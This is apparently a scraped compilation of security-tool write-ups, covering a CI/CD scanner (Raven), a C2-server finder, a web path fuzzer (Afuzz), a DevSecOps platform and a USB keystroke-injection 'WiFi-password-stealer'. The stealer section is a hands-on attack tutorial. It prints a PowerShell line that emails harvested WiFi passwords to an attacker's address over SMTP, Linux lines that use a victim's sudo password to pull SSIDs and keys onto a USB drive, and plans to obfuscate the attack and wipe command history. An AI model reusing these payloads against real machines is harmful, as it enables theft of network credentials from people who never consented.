This tool provides a reliable and scalable solution for CI/CD security analysis, enabling users to query bad configurations and gain valuable insights into their codebase's security posture.

Why Raven

In the past year, Cycode Labs conducted extensive research on fundamental security issues of CI/CD systems. We examined the depths of many systems, thousands of projects, and several configurations. The conclusion is clear – the model in which security is delegated to developers has failed. This has been proven several times in our previous content:

  • A simple injection scenario exposed dozens of public repositories, including popular open-source projects.
  • We found that one of the most popular frontend frameworks was vulnerable to the innovative method of branch injection attack.
  • We detailed a completely different attack vector, 3rd party integration risks, the most popular project on GitHub, and thousands more.
  • Finally, the Microsoft 365 UI framework, with more than 300 million users, is vulnerable to an additional new threat – an artifact poisoning attack.
  • Additionally, we found, reported, and disclosed hundreds of other vulnerabilities privately.

Each of the vulnerabilities above has unique characteristics, making it nearly impossible for developers to stay up to date with the latest security trends. Unfortunately, each vulnerability shares a commonality – each exploitation can impact millions of victims.

It was for these reasons that Raven was created, a framework for CI/CD security analysis workflows (and GitHub Actions as the first use case). In our focus, we examined complex scenarios where each issue isn't a threat on its own, but when combined, they pose a severe threat.

Setup && Run

To get started with Raven, follow these installation instructions:

Step 1: Install the Raven package

pip3 install raven-cycode

Step 2: Setup a local Redis server and Neo4j database

docker run -d --name raven-neo4j -p7474:7474 -p7687:7687 --env NEO4J_AUTH=neo4j/123456789 --volume raven-neo4j:/data neo4j:5.12
docker run -d --name raven-redis -p6379:6379 --volume raven-redis:/data redis:7.2.1

Another way to setup the environment is by running our provided docker compose file:

git clone https://github.com/CycodeLabs/raven.git
cd raven
make setup

Step 3: Run Raven Downloader

Org mode:

raven download org --token $GITHUB_TOKEN --org-name RavenDemo

Crawl mode:

raven download crawl --token $GITHUB_TOKEN --min-stars 1000

Step 4: Run Raven Indexer

raven index

Step 5: Inspect the results through the reporter

raven report --format raw

At this point, it is possible to inspect the data in the Neo4j database, by connecting http://localhost:7474/browser/.

Prerequisites

  • Python 3.9+
  • Docker Compose v2.1.0+
  • Docker Engine v1.13.0+

Infrastructure

Raven is using two primary docker containers: Redis and Neo4j. make setup will run a docker compose command to prepare that environment.

Usage

The tool contains three main functionalities, download and index and report.

Download

Download Organization Repositories

usage: raven download org [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] --org-name ORG_NAME

options:
-h, --help show this help message and exit
--token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
--debug Whether to print debug statements, default: False
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--org-name ORG_NAME Organization name to download the workflows

Download Public Repositories

usage: raven download crawl [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--max-stars MAX_STARS] [--min-stars MIN_STARS]

options:
-h, --help show this help message and exit
--token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
--debug Whether to print debug statements, default: False
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--max-stars MAX_STARS
Maximum number of stars for a repository
--min-stars MIN_STARS
Minimum number of stars for a repository, default : 1000

Index

usage: raven index [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI] [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS]
[--clean-neo4j] [--debug]

options:
-h, --help show this help message and exit
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--neo4j-uri NEO4J_URI
Neo4j URI endpoint, default: neo4j://localhost:7687
--neo4j-user NEO4J_USER
Neo4j username, default: neo4j
--neo4j-pass NEO4J_PASS
Neo4j password, default: 123456789
--clean-neo4j, -cn Whether to clean cache, and index f rom scratch, default: False
--debug Whether to print debug statements, default: False

Report

usage: raven report [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI]
[--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS] [--clean-neo4j]
[--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}]
[--severity {info,low,medium,high,critical}] [--queries-path QUERIES_PATH] [--format {raw,json}]
{slack} ...

positional arguments:
{slack}
slack Send report to slack channel

options:
-h, --help show this help message and exit
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--neo4j-uri NEO4J_URI
Neo4j URI endpoint, default: neo4j://localhost:7687
--neo4j-user NEO4J_USER
Neo4j username, default: neo4j
--neo4j-pass NEO4J_PASS
Neo4j password, default: 123456789
--clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False
--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}, -t {injection,unauthenticated,fixed,priv-esc,supply-chain}
Filter queries with specific tag
--severity {info,low,medium,high,critical}, -s {info,low,medium,high,critical}
Filter queries by severity level (default: info)
--queries-path QUERIES_PATH, -dp QUERIES_PATH
Queries folder (default: library)
--format {raw,json}, -f {raw,json}
Report format (default: raw)

Examples

Retrieve all workflows and actions associated with the organization.

raven download org --token $GITHUB_TOKEN --org-name microsoft --org-name google --debug

Scrape all publicly accessible GitHub repositories.

raven download crawl --token $GITHUB_TOKEN --min-stars 100 --max-stars 1000 --debug

After finishing the download process or if interrupted using Ctrl+C, proceed to index all workflows and actions into the Neo4j database.

raven index --debug

Now, we can generate a report using our query library.

raven report --severity high --tag injection --tag unauthenticated

Rate Limiting

For effective rate limiting, you should supply a Github token. For authenticated users, the next rate limiting applies:

  • Code search - 30 queries per minute
  • Any other API - 5000 per hour

Research Knowledge Base

Current Limitations

  • It is possible to run external action by referencing a folder with a Dockerfile (without action.yml). Currently, this behavior isn't supported.
  • It is possible to run external action by referencing a docker container through the docker://... URL. Currently, this behavior isn't supported.
  • It is possible to run an action by referencing it locally. This creates complex behavior, as it may come from a different repository that was checked out previously. The current behavior is trying to find it in the existing repository.
  • We aren't modeling the entire workflow structure. If additional fields are needed, please submit a pull request according to the contribution guidelines.

Future Research Work

  • Implementation of taint analysis. Example use case - a user can pass a pull request title (which is controllable parameter) to an action parameter that is named data. That action parameter may be used in a run command: - run: echo ${{ inputs.data }}, which creates a path for a code execution.
  • Expand the research for findings of harmful misuse of GITHUB_ENV. This may utilize the previous taint analysis as well.
  • Research whether actions/github-script has an interesting threat landscape. If it is, it can be modeled in the graph.

Want more of CI/CD Security, AppSec, and ASPM? Check out Cycode

If you liked Raven, you would probably love our Cycode platform that offers even more enhanced capabilities for visibility, prioritization, and remediation of vulnerabilities across the software delivery.

If you are interested in a robust, research-driven Pipeline Security, Application Security, or ASPM solution, don't hesitate to get in touch with us or request a demo using the form https://cycode.com/book-a-demo/.



WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

By: Zion3R


Have you ever watched a film where a hacker would plug-in, seemingly ordinary, USB drive into a victim's computer and steal data from it? - A proper wet dream for some.

Disclaimer: All content in this project is intended for security research purpose only.

 

Introduction

During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

Setup

After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.

Prerequisites

  • Physical access to victim's computer.

  • Unlocked victim's computer.

  • Victim's computer has to have an internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.

  • Knowledge of victim's computer password for the Linux exploit.

Requirements - What you'll need


  • Raspberry Pi Pico (RPi Pico)
  • Micro USB to USB Cable
  • Jumper Wire (optional)
  • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
  • USB flash drive (for the exploit over physical medium only)


Note:

  • It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.

  • However, while pico-ducky is a good and budget-friedly solution, Rubber Ducky does offer things like stealthiness and usage of the lastest DuckyScript version.

  • In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

Keystroke injection tool

Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

Keystroke injection

The payload uses STRING command processes keystroke for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. The ENTER/SPACE will simulate a press of keyboard keys.

Delays

We use DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a Command Line to load. Delay is useful when used at the very beginning when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs setup time is very short. In most cases, it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.

Exfiltration

Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, adversary can package it to avoid detection while sending data over the network, using encryption or compression. Two most common way of exfiltration are:

  • Exfiltration over the network medium.
    • This approach was used for the Windows exploit. The whole payload can be seen here.

  • Exfiltration over a physical medium.
    • This approach was used for the Linux exploit. The whole payload can be seen here.

Windows exploit

In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

Sending stolen data over email

Once passwords have been exported to the .txt file, payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit a following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and yours email PASSWORD. In addition, you could also update the body and the subject of the email.

STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

Note:

  • After sending data over the email, the .txt file is deleted.

  • You can also use some an SMTP from another email provider, but you should be mindful of SMTP server and port number you will write in the payload.

  • Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

Linux exploit

In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.

Storing stolen data to USB flash drive

Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

STRING echo PASSWORD | sudo -S echo

STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

Bash script

In order to run the wifi_passwords_print.sh script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:

echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

where PASSWORD is your account's password and USBSTICK is the name for your USB device.

Quick overview of the payload

NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses .ini-style keyfile format and stores network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with regex in order to extract data of interest. For file filtering, a modified positive lookbehind assertion was used ((?<=keyword)). While the positive lookbehind assertion will match at a certain position in the string, sc. at a position right after the keyword without making that text itself part of the match, the regex (?<=keyword).* will match any text after the keyword. This allows the payload to match the values after SSID and psk (pre-shared key) keywords.

For more information about NetworkManager here is some useful links:

Exfiltrated data formatting

Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

Wireless_Network_Name Password
--------------------- --------
WLAN1 pass1
WLAN2 pass2
WLAN3 pass3

USB Mass Storage Device Problem

One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees it as a USB keyboard. This isn't a default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.

Tip:

  • Upload your payload to RPi Pico before you connect the pins.
  • Don't solder the pins because you will probably want to change/update the payload at some point.

Payload Writer

When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, a name of the OS (windows or linux) and the name of the payload file (e.q. payload1.dd). Below you can find an example how to run the writer script when creating a Windows payload.

python3 writer.py windows payload1.dd

Limitations/Drawbacks

  • This pico-ducky currently works only on Windows OS.

  • This attack requires physical access to an unlocked device in order to be successfully deployed.

  • The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admins password for the Linux machine.

  • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

  • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

  • The pico-ducky device isn't really stealthy, actually it's quite the opposite, it's really bulky especially if you solder the pins.

  • Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

  • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

  • If the computer has a non-English Environment set, this exploit won't be successful.

  • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

To-Do List

  • Fix Caps Lock bug.
  • Fix non-English Environment bug.
  • Obfuscate the command prompt.
  • Implement exfiltration over a physical medium.
  • Create a payload for Linux.
  • Encode/Encrypt exfiltrated data before sending it over email.
  • Implement indicator of successfully completed exploit.
  • Implement command history clean-up for Linux exploit.
  • Enhance the Linux exploit in order to avoid usage of sudo.


C2-Search-Netlas - Search For C2 Servers Based On Netlas

By: Zion3R

C2 Search Netlas is a Java utility designed to detect Command and Control (C2) servers using the Netlas API. It provides a straightforward and user-friendly CLI interface for searching C2 servers, leveraging the Netlas API to gather data and process it locally.


Search for c2 servers based on netlas (8)

Usage

To utilize this terminal utility, you'll need a Netlas API key. Obtain your key from the Netlas website.

After acquiring your API key, execute the following command to search servers:

c2detect -t <TARGET_DOMAIN> -p <TARGET_PORT> -s <API_KEY> [-v]

Replace <TARGET_DOMAIN> with the desired IP address or domain, <TARGET_PORT> with the port you wish to scan, and <API_KEY> with your Netlas API key. Use the optional -v flag for verbose output. For example, to search at the google.com IP address on port 443 using the Netlas API key 1234567890abcdef, enter:

c2detect -t google.com -p 443 -s 1234567890abcdef

Release

To download a release of the utility, follow these steps:

  • Visit the repository's releases page on GitHub.
  • Download the latest release file (typically a JAR file) to your local machine.
  • In a terminal, navigate to the directory containing the JAR file.
  • Execute the following command to initiate the utility:
java -jar c2-search-netlas-<version>.jar -t <ip-or-domain> -p <port> -s <your-netlas-api-key>

Docker

To build and start the Docker container for this project, run the following commands:

docker build -t c2detect .
docker run -it --rm \
c2detect \
-s "your_api_key" \
-t "your_target_domain" \
-p "your_target_port" \
-v

Source

To use this utility, you need to have a Netlas API key. You can get the key from the Netlas website. Now you can build the project and run it using the following commands:

./gradlew build
java -jar app/build/libs/c2-search-netlas-1.0-SNAPSHOT.jar --help

This will display the help message with available options. To search for C2 servers, run the following command:

java -jar app/build/libs/c2-search-netlas-1.0-SNAPSHOT.jar -t <ip-or-domain> -p <port> -s <your-netlas-api-key>

This will display a list of C2 servers found in the given IP address or domain.

Support

Name Support
Metasploit
Havoc
Cobalt Strike
Bruteratel
Sliver
DeimosC2
PhoenixC2
Empire
Merlin
Covenant
Villain
Shad0w
PoshC2

Legend:

  • ✅ - Accept/good support
  • ❓ - Support unknown/unclear
  • ❌ - No support/poor support

Contributing

If you'd like to contribute to this project, please feel free to create a pull request.

License

This project is licensed under the License - see the LICENSE file for details.



Afuzz - Automated Web Path Fuzzing Tool For The Bug Bounty Projects

By: Zion3R

Afuzz is an automated web path fuzzing tool for the Bug Bounty projects.

Afuzz is being actively developed by @rapiddns


Features

  • Afuzz automatically detects the development language used by the website, and generates extensions according to the language
  • Uses blacklist to filter invalid pages
  • Uses whitelist to find content that bug bounty hunters are interested in in the page
  • filters random content in the page
  • judges 404 error pages in multiple ways
  • perform statistical analysis on the results after scanning to obtain the final result.
  • support HTTP2

Installation

git clone https://github.com/rapiddns/Afuzz.git
cd Afuzz
python setup.py install

OR

pip install afuzz

Run

afuzz -u http://testphp.vulnweb.com -t 30

Result

Table

+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| http://testphp.vulnweb.com/ |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+
| target | path | status | redirect | title | length | content-type | lines | words | type | mark |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+ -----------+----------+
| http://testphp.vulnweb.com/ | .idea/workspace.xml | 200 | | | 12437 | text/xml | 217 | 774 | check | |
| http://testphp.vulnweb.com/ | admin | 301 | http://testphp.vulnweb.com/admin/ | 301 Moved Permanently | 169 | text/html | 8 | 11 | folder | 30x |
| http://testphp.vulnweb.com/ | login.php | 200 | | login page | 5009 | text/html | 120 | 432 | check | |
| http://testphp.vulnweb.com/ | .idea/.name | 200 | | | 6 | application/octet-stream | 1 | 1 | check | |
| http://testphp.vulnweb.com/ | .idea/vcs.xml | 200 | | | 173 | text/xml | 8 | 13 | check | |
| http://testphp.vulnweb.com/ | .idea/ | 200 | | Index of /.idea/ | 937 | text/html | 14 | 46 | whitelist | index of |
| http://testphp.vulnweb.com/ | cgi-bin/ | 403 | | 403 Forbidden | 276 | text/html | 10 | 28 | folder | 403 |
| http://testphp.vulnweb.com/ | .idea/encodings.xml | 200 | | | 171 | text/xml | 6 | 11 | check | |
| http://testphp.vulnweb.com/ | search.php | 200 | | search | 4218 | text/html | 104 | 364 | check | |
| http://testphp.vulnweb.com/ | produc t.php | 200 | | picture details | 4576 | text/html | 111 | 377 | check | |
| http://testphp.vulnweb.com/ | admin/ | 200 | | Index of /admin/ | 248 | text/html | 8 | 16 | whitelist | index of |
| http://testphp.vulnweb.com/ | .idea | 301 | http://testphp.vulnweb.com/.idea/ | 301 Moved Permanently | 169 | text/html | 8 | 11 | folder | 30x |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+```

Json

{
"result": [
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/workspace.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 12437,
"content_type": "text/xml",
"lines": 217,
"words": 774,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/workspace.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "admin",
"status": 301,
"redirect": "http://testphp.vulnweb.com/admin/",
"title": "301 Moved Permanently",
"length": 169,
"content_type": "text/html",
"lines": 8,
"words ": 11,
"type": "folder",
"mark": "30x",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/admin"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "login.php",
"status": 200,
"redirect": "",
"title": "login page",
"length": 5009,
"content_type": "text/html",
"lines": 120,
"words": 432,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/login.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/.name",
"status": 200,
"redirect": "",
"title": "",
"length": 6,
"content_type": "application/octet-stream",
"lines": 1,
"words": 1,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/.name"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/vcs.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 173,
"content_type": "text/xml",
"lines": 8,
"words": 13,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/vcs.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/",
"status": 200,
"redirect": "",
"title": "Index of /.idea/",
"length": 937,
"content_type": "text/html",
"lines": 14,
"words": 46,
"type": "whitelist",
"mark": "index of",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "cgi-bin/",
"status": 403,
"redirect": "",
"title": "403 Forbidden",
"length": 276,
"content_type": "text/html",
"lines": 10,
"words": 28,
"type": "folder",
"mark": "403",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/cgi-bin/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/encodings.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 171,
"content_type": "text/xml",
"lines": 6,
"words": 11,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/encodings.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "search.php",
"status": 200,
"redirect": "",
"title": "search",
"length": 4218,
"content_type": "text/html",
"lines": 104,
"words": 364,
"t ype": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/search.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "product.php",
"status": 200,
"redirect": "",
"title": "picture details",
"length": 4576,
"content_type": "text/html",
"lines": 111,
"words": 377,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/product.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "admin/",
"status": 200,
"redirect": "",
"title": "Index of /admin/",
"length": 248,
"content_type": "text/html",
"lines": 8,
"words": 16,
"type": "whitelist",
"mark": "index of",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/admin/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea",
"status": 301,
"redirect": "http://testphp.vulnweb.com/.idea/",
"title": "301 Moved Permanently",
"length": 169,
"content_type": "text/html",
"lines": 8,
"words": 11,
"type": "folder",
"mark": "30x",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea"
}
],
"total": 12,
"targe t": "http://testphp.vulnweb.com/"
}

Wordlists (IMPORTANT)

Summary:

  • Wordlist is a text file, each line is a path.
  • About extensions, Afuzz replaces the %EXT% keyword with extensions from -e flag.If no flag -e, the default is used.
  • Generate a dictionary based on domain names. Afuzz replaces %subdomain% with host, %rootdomain% with root domain, %sub% with subdomain, and %domain% with domain. And generated according to %ext%

Examples:

  • Normal extensions
index.%EXT%

Passing asp and aspx extensions will generate the following dictionary:

index
index.asp
index.aspx
  • host
%subdomain%.%ext%
%sub%.bak
%domain%.zip
%rootdomain%.zip

Passing https://test-www.hackerone.com and php extension will genrate the following dictionary:

test-www.hackerone.com.php
test-www.zip
test.zip
www.zip
testwww.zip
hackerone.zip
hackerone.com.zip

Options

    #     ###### ### ###  ######  ######
# # # # # # # # #
# # # # # # # # # #
# # ### # # # #
# # # # # # # #
##### # # # # # # #
# # # # # # # # #
### ### ### ### ###### ######



usage: afuzz [options]

An Automated Web Path Fuzzing Tool.
By RapidDNS (https://rapiddns.io)

options:
-h, --help show this help message and exit
-u URL, --url URL Target URL
-o OUTPUT, --output OUTPUT
Output file
-e EXTENSIONS, --extensions EXTENSIONS
Extension list separated by commas (Example: php,aspx,jsp)
-t THREAD, --thread THREAD
Number of threads
-d DEPTH, --depth DEPTH
Maximum recursion depth
-w WORDLIST, --wordlist WORDLIST
wordlist
-f, --fullpath fullpath
-p PROXY, --proxy PROXY
proxy, (ex:http://127.0.0.1:8080)

How to use

Some examples for how to use Afuzz - those are the most common arguments. If you need all, just use the -h argument.

Simple usage

afuzz -u https://target
afuzz -e php,html,js,json -u https://target
afuzz -e php,html,js -u https://target -d 3

Threads

The thread number (-t | --threads) reflects the number of separated brute force processes. And so the bigger the thread number is, the faster afuzz runs. By default, the number of threads is 10, but you can increase it if you want to speed up the progress.

In spite of that, the speed still depends a lot on the response time of the server. And as a warning, we advise you to keep the threads number not too big because it can cause DoS.

afuzz -e aspx,jsp,php,htm,js,bak,zip,txt,xml -u https://target -t 50

Blacklist

The blacklist.txt and bad_string.txt files in the /db directory are blacklists, which can filter some pages

The blacklist.txt file is the same as dirsearch.

The bad_stirng.txt file is a text file, one per line. The format is position==content. With == as the separator, position has the following options: header, body, regex, title

Language detection

The language.txt is the detection language rule, the format is consistent with bad_string.txt. Development language detection for website usage.

References

Thanks to open source projects for inspiration

  • Dirsearch by by Shubham Sharma
  • wfuzz by Xavi Mendez
  • arjun by Somdev Sangwan


SecuSphere - Efficient DevSecOps

By: Zion3R


SecuSphere is a comprehensive DevSecOps platform designed to streamline and enhance your organization's security posture throughout the software development life cycle. Our platform serves as a centralized hub for vulnerability management, security assessments, CI/CD pipeline integration, and fostering DevSecOps practices and culture.


Centralized Vulnerability Management

At the heart of SecuSphere is a powerful vulnerability management system. Our platform collects, processes, and prioritizes vulnerabilities, integrating with a wide array of vulnerability scanners and security testing tools. Risk-based prioritization and automated assignment of vulnerabilities streamline the remediation process, ensuring that your teams tackle the most critical issues first. Additionally, our platform offers robust dashboards and reporting capabilities, allowing you to track and monitor vulnerability status in real-time.

Seamless CI/CD Pipeline Integration

SecuSphere integrates seamlessly with your existing CI/CD pipelines, providing real-time security feedback throughout your development process. Our platform enables automated triggering of security scans and assessments at various stages of your pipeline. Furthermore, SecuSphere enforces security gates to prevent vulnerable code from progressing to production, ensuring that security is built into your applications from the ground up. This continuous feedback loop empowers developers to identify and fix vulnerabilities early in the development cycle.

Comprehensive Security Assessment

SecuSphere offers a robust framework for consuming and analyzing security assessment reports from various CI/CD pipeline stages. Our platform automates the aggregation, normalization, and correlation of security findings, providing a holistic view of your application's security landscape. Intelligent deduplication and false-positive elimination reduce noise in the vulnerability data, ensuring that your teams focus on real threats. Furthermore, SecuSphere integrates with ticketing systems to facilitate the creation and management of remediation tasks.

Cultivating DevSecOps Practices

SecuSphere goes beyond tools and technology to help you drive and accelerate the adoption of DevSecOps principles and practices within your organization. Our platform provides security training and awareness for developers, security, and operations teams, helping to embed security within your development and operations processes. SecuSphere aids in establishing secure coding guidelines and best practices and fosters collaboration and communication between security, development, and operations teams. With SecuSphere, you'll create a culture of shared responsibility for security, enabling you to build more secure, reliable software.

Embrace the power of integrated DevSecOps with SecuSphere – secure your software development, from code to cloud.

 Features

  • Vulnerability Management: Collect, process, prioritize, and remediate vulnerabilities from a centralized platform, integrating with various vulnerability scanners and security testing tools.
  • CI/CD Pipeline Integration: Provide real-time security feedback with seamless CI/CD pipeline integration, including automated security scans, security gates, and a continuous feedback loop for developers.
  • Security Assessment: Analyze security assessment reports from various CI/CD pipeline stages with automated aggregation, normalization, correlation of security findings, and intelligent deduplication.
  • DevSecOps Practices: Drive and accelerate the adoption of DevSecOps principles and practices within your team. Benefit from our security training, secure coding guidelines, and collaboration tools.

Dashboard and Reporting

SecuSphere offers built-in dashboards and reporting capabilities that allow you to easily track and monitor the status of vulnerabilities. With our risk-based prioritization and automated assignment features, vulnerabilities are efficiently managed and sent to the relevant teams for remediation.

API and Web Console

SecuSphere provides a comprehensive REST API and Web Console. This allows for greater flexibility and control over your security operations, ensuring you can automate and integrate SecuSphere into your existing systems and workflows as seamlessly as possible.

For more information please refer to our Official Rest API Documentation

Integration with Ticketing Systems

SecuSphere integrates with popular ticketing systems, enabling the creation and management of remediation tasks directly within the platform. This helps streamline your security operations and ensure faster resolution of identified vulnerabilities.

Security Training and Awareness

SecuSphere is not just a tool, it's a comprehensive solution that drives and accelerates the adoption of DevSecOps principles and practices. We provide security training and awareness for developers, security, and operations teams, and aid in establishing secure coding guidelines and best practices.

User Guide

Get started with SecuSphere using our comprehensive user guide.

 Installation

You can install SecuSphere by cloning the repository, setting up locally, or using Docker.

Clone the Repository

$ git clone https://github.com/SecurityUniversalOrg/SecuSphere.git

Setup

Local Setup

Navigate to the source directory and run the Python file:

$ cd src/
$ python run.py

Dockerfile Setup

Build and run the Dockerfile in the cicd directory:

$ # From repository root
$ docker build -t secusphere:latest .
$ docker run secusphere:latest

Docker Compose

Use Docker Compose in the ci_cd/iac/ directory:

$ cd ci_cd/iac/
$ docker-compose -f secusphere.yml up

Pull from Docker Hub

Pull the latest version of SecuSphere from Docker Hub and run it:

$ docker pull securityuniversal/secusphere:latest
$ docker run -p 8081:80 -d secusphere:latest

Feedback and Support

We value your feedback and are committed to providing the best possible experience with SecuSphere. If you encounter any issues or have suggestions for improvement, please create an issue in this repository or contact our support team.

Contributing

We welcome contributions to SecuSphere. If you're interested in improving SecuSphere or adding new features, please read our contributing guide.



VTScanner - A Comprehensive Python-based Security Tool For File Scanning, Malware Detection, And Analysis In An Ever-Evolving Cyber Landscape

By: Zion3R

